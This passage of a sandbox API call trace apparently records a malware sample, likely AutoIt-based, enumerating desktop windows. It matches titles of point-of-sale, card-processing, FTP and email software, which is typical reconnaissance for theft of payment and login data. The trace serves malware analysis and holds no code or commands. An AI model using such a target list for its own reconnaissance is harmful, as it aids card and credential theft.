wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.831] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.831] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.831] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.831] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.831] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.831] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.831] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.831] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.832] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.832] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.832] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.832] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.832] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.832] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.832] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.832] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.832] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.832] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.832] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.832] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.832] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.832] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.832] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.832] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.833] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.833] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.833] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.833] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.833] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.833] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.833] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.833] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.833] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.833] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.833] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.833] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.833] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.833] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.833] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.834] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.834] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.834] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.834] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.834] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.834] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.834] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.834] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.834] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.834] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.834] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.834] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.834] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.834] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.834] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.834] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.834] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.834] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.835] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.835] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.835] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.835] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.835] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.835] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.835] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.835] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.835] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.835] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.835] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.840] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.840] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.840] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.840] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.840] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.840] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.841] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.841] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.841] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.841] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.841] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.841] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.841] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.841] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.841] EnumWindows (lpEnumFunc=0xf7aed4, lParam=0xfe5500) returned 1 [0119.841] GetWindowTextW (in: hWnd=0x10128, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.841] GetClassNameW (in: hWnd=0x10128, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="ForegroundStaging") returned 17 [0119.842] GetWindowTextW (in: hWnd=0x100f8, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.842] GetClassNameW (in: hWnd=0x100f8, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="ForegroundStaging") returned 17 [0119.842] GetWindowTextW (in: hWnd=0x100ca, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.842] GetClassNameW (in: hWnd=0x100ca, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0119.842] GetWindowTextW (in: hWnd=0x100a4, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.842] GetClassNameW (in: hWnd=0x100a4, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0119.842] GetWindowTextW (in: hWnd=0x100a8, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.843] GetClassNameW (in: hWnd=0x100a8, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0119.843] GetWindowTextW (in: hWnd=0x100b4, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.843] GetClassNameW (in: hWnd=0x100b4, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0119.843] GetWindowTextW (in: hWnd=0x100be, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.843] GetClassNameW (in: hWnd=0x100be, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0119.843] GetWindowTextW (in: hWnd=0x100c2, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.843] GetClassNameW (in: hWnd=0x100c2, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0119.844] GetWindowTextW (in: hWnd=0x1008c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.844] GetClassNameW (in: hWnd=0x1008c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0119.844] GetWindowTextW (in: hWnd=0x10098, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.844] GetClassNameW (in: hWnd=0x10098, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0119.844] GetWindowTextW (in: hWnd=0x100bc, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.844] GetClassNameW (in: hWnd=0x100bc, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0119.844] GetWindowTextW (in: hWnd=0x10080, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.844] GetClassNameW (in: hWnd=0x10080, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Shell_TrayWnd") returned 13 [0119.844] GetWindowTextW (in: hWnd=0x20048, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Network Flyout") returned 14 [0119.845] GetClassNameW (in: hWnd=0x20048, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="ATL:00007FFB0FD84120") returned 20 [0119.845] GetWindowTextW (in: hWnd=0x100d6, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.845] GetClassNameW (in: hWnd=0x100d6, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0119.845] GetWindowTextW (in: hWnd=0x100cc, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.845] GetClassNameW (in: hWnd=0x100cc, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0119.845] GetWindowTextW (in: hWnd=0x802d6, lpString=0x7deed0, nMaxCount=1024 | out: lpString="AutoIt v3") returned 9 [0119.845] NtdllDefWindowProc_W (hWnd=0x802d6, Msg=0xd, wParam=0x400, lParam=0x7deed0) returned 0x9 [0119.845] GetClassNameW (in: hWnd=0x802d6, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="AutoIt v3") returned 9 [0119.845] GetWindowTextW (in: hWnd=0x4035c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.846] GetClassNameW (in: hWnd=0x4035c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="URL Moniker Notification Window") returned 31 [0119.846] GetWindowTextW (in: hWnd=0x20286, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Blank Page - Internet Explorer") returned 30 [0119.846] GetClassNameW (in: hWnd=0x20286, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="TabThumbnailWindow") returned 18 [0119.846] GetWindowTextW (in: hWnd=0x202d8, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.847] GetClassNameW (in: hWnd=0x202d8, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="VSyncHelper-0062D168-9f59f66") returned 28 [0119.847] GetWindowTextW (in: hWnd=0x20364, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.847] GetClassNameW (in: hWnd=0x20364, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Alternate Owner") returned 15 [0119.847] GetWindowTextW (in: hWnd=0x10336, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Omnipos") returned 7 [0119.847] GetClassNameW (in: hWnd=0x10336, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="omniposclass") returned 12 [0119.848] GetWindowTextW (in: hWnd=0x2021e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Nor Development Rather") returned 22 [0119.848] GetClassNameW (in: hWnd=0x2021e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="nordevelopmentRatherclass") returned 25 [0119.848] GetWindowTextW (in: hWnd=0x1036a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Force Which Baby") returned 16 [0119.848] GetClassNameW (in: hWnd=0x1036a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="force_which_Baby_cls") returned 20 [0119.849] GetWindowTextW (in: hWnd=0x10366, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Drive Law") returned 9 [0119.849] GetClassNameW (in: hWnd=0x10366, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="DriveLawwindow") returned 14 [0119.849] GetWindowTextW (in: hWnd=0x10306, lpString=0x7deed0, nMaxCount=1024 | out: lpString="3Dftp") returned 5 [0119.850] GetClassNameW (in: hWnd=0x10306, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="3dftp") returned 5 [0119.850] GetWindowTextW (in: hWnd=0x10344, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Utg2") returned 4 [0119.850] GetClassNameW (in: hWnd=0x10344, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="utg2_cls") returned 8 [0119.850] GetWindowTextW (in: hWnd=0x10340, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Spgagentservice") returned 15 [0119.850] GetClassNameW (in: hWnd=0x10340, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="spgagentservicewindow") returned 21 [0119.850] GetWindowTextW (in: hWnd=0x102e6, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Barca") returned 5 [0119.850] GetClassNameW (in: hWnd=0x102e6, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="barca_class") returned 11 [0119.850] GetWindowTextW (in: hWnd=0x1038e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.851] GetClassNameW (in: hWnd=0x1038e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0119.851] GetWindowTextW (in: hWnd=0x10342, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Spcwin") returned 6 [0119.851] GetClassNameW (in: hWnd=0x10342, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="spcwin_wnd") returned 10 [0119.851] GetWindowTextW (in: hWnd=0x10338, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Fpos") returned 4 [0119.851] GetClassNameW (in: hWnd=0x10338, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="fpos") returned 4 [0119.851] GetWindowTextW (in: hWnd=0x10330, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Isspos") returned 6 [0119.851] GetClassNameW (in: hWnd=0x10330, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="issposwin") returned 9 [0119.851] GetWindowTextW (in: hWnd=0x1032e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Far") returned 3 [0119.857] GetClassNameW (in: hWnd=0x1032e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="farclass") returned 8 [0119.857] GetWindowTextW (in: hWnd=0x1032c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Edcsvr") returned 6 [0119.857] GetClassNameW (in: hWnd=0x1032c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="edcsvrwindow") returned 12 [0119.857] GetWindowTextW (in: hWnd=0x102e2, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Coreftp") returned 7 [0119.858] GetClassNameW (in: hWnd=0x102e2, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="coreftpclass") returned 12 [0119.858] GetWindowTextW (in: hWnd=0x1032a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Mxslipstream") returned 12 [0119.858] GetClassNameW (in: hWnd=0x1032a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="mxslipstream_cls") returned 16 [0119.859] GetWindowTextW (in: hWnd=0x10324, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Thunderbird") returned 11 [0119.859] GetClassNameW (in: hWnd=0x10324, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="thunderbird_app") returned 15 [0119.860] GetWindowTextW (in: hWnd=0x10322, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Aldelo") returned 6 [0119.860] GetClassNameW (in: hWnd=0x10322, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="aldelo_app") returned 10 [0119.860] GetWindowTextW (in: hWnd=0x10320, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Pidgin") returned 6 [0119.860] GetClassNameW (in: hWnd=0x10320, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="pidgin") returned 6 [0119.860] GetWindowTextW (in: hWnd=0x1031e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Outlook") returned 7 [0119.861] GetClassNameW (in: hWnd=0x1031e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="outlook_class") returned 13 [0119.861] GetWindowTextW (in: hWnd=0x10316, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Smartftp") returned 8 [0119.862] GetClassNameW (in: hWnd=0x10316, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="smartftp_wnd") returned 12 [0119.862] GetWindowTextW (in: hWnd=0x10308, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Webdrive") returned 8 [0119.862] GetClassNameW (in: hWnd=0x10308, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="webdrive_wnd") returned 12 [0119.862] GetWindowTextW (in: hWnd=0x10310, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Ccv_Server") returned 10 [0119.862] GetClassNameW (in: hWnd=0x10310, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="ccv_server_wnd") returned 14 [0119.863] GetWindowTextW (in: hWnd=0x10314, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Creditservice") returned 13 [0119.863] GetClassNameW (in: hWnd=0x10314, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="creditserviceclass") returned 18 [0119.863] GetWindowTextW (in: hWnd=0x102f6, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Flashfxp") returned 8 [0119.863] GetClassNameW (in: hWnd=0x102f6, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="flashfxpwin") returned 11 [0119.863] GetWindowTextW (in: hWnd=0x10304, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Gmailnotifierpro") returned 16 [0119.864] GetClassNameW (in: hWnd=0x10304, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="gmailnotifierprocls") returned 19 [0119.864] GetWindowTextW (in: hWnd=0x10302, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Accupos") returned 7 [0119.864] GetClassNameW (in: hWnd=0x10302, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="accuposwindow") returned 13 [0119.865] GetWindowTextW (in: hWnd=0x10300, lpString=0x7deed0, nMaxCount=1024 